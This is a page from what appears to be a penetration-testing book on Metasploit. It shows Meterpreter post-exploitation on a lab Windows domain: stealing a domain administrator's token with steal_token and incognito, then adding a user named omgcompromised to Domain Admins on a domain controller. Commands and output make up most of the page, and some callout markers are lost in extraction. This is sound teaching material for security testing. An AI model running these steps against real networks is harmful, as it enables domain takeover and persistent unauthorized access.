background image

88

Chapter 6

As shown in the following listing, we leverage 

steal_token

 and the PID 

(380 in this case) to steal the token of that user and assume the role of the 
domain administrator:

meterpreter > 

steal_token 380

Stolen token with username: SNEAKS.IN\ihazdomainadmin
meterpreter >

We have successfully impersonated the domain administrator account 

and Meterpreter is now running under the context of that user.

In some cases, 

ps

 may not list a running process running as a domain 

administrator. We can leverage 

incognito

 to list available tokens on the system 

as well. When performing a penetration test, we should check the output of 
both 

ps

 and 

icognito

 because the results may vary. 

We load 

incognito

 with 

use incognito

 and then list tokens with 

list_tokens -u

Looking through the list of tokens, we see the 

SNEAKS.IN\ihazdomainadmin

 user 

account at  . Now we can pretend to be someone else.

meterpreter > 

use incognito

Loading extension incognito...success.
meterpreter > 

list_tokens -u

[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
SNEAKS.IN\ihazdomainadmin 
IHAZSECURITY\Administrator
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM

Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON

As shown in the next listing, we successfully impersonate the 

ihazdomainadmin

 

token at   and add a user account at  , which we then give domain admin-
istrator rights at  . (Be sure to use two backslashes, 

\\

, when entering the 

DOMAIN\USERNAME

 at  .) Our domain controller is 192.168.33.50.

meterpreter > 

impersonate_token SNEAKS.IN\\ihazdomainadmin

 

[+] Delegation token available
[+] Successfully impersonated user SNEAKS.IN\ihazdomainadmin
meterpreter > 

add_user omgcompromised p@55w0rd! -h 192.168.33.50

 

[*] Attempting to add user omgcompromised to host 192.168.33.50
[+] Successfully added user
meterpreter > 

add_group_user "Domain Admins" omgcompromised -h 192.168.33.50

 

[*]   Attempting to add user omgcompromised to group Domain Admins on domain controller

192.168.33.50

[+] Successfully added user to group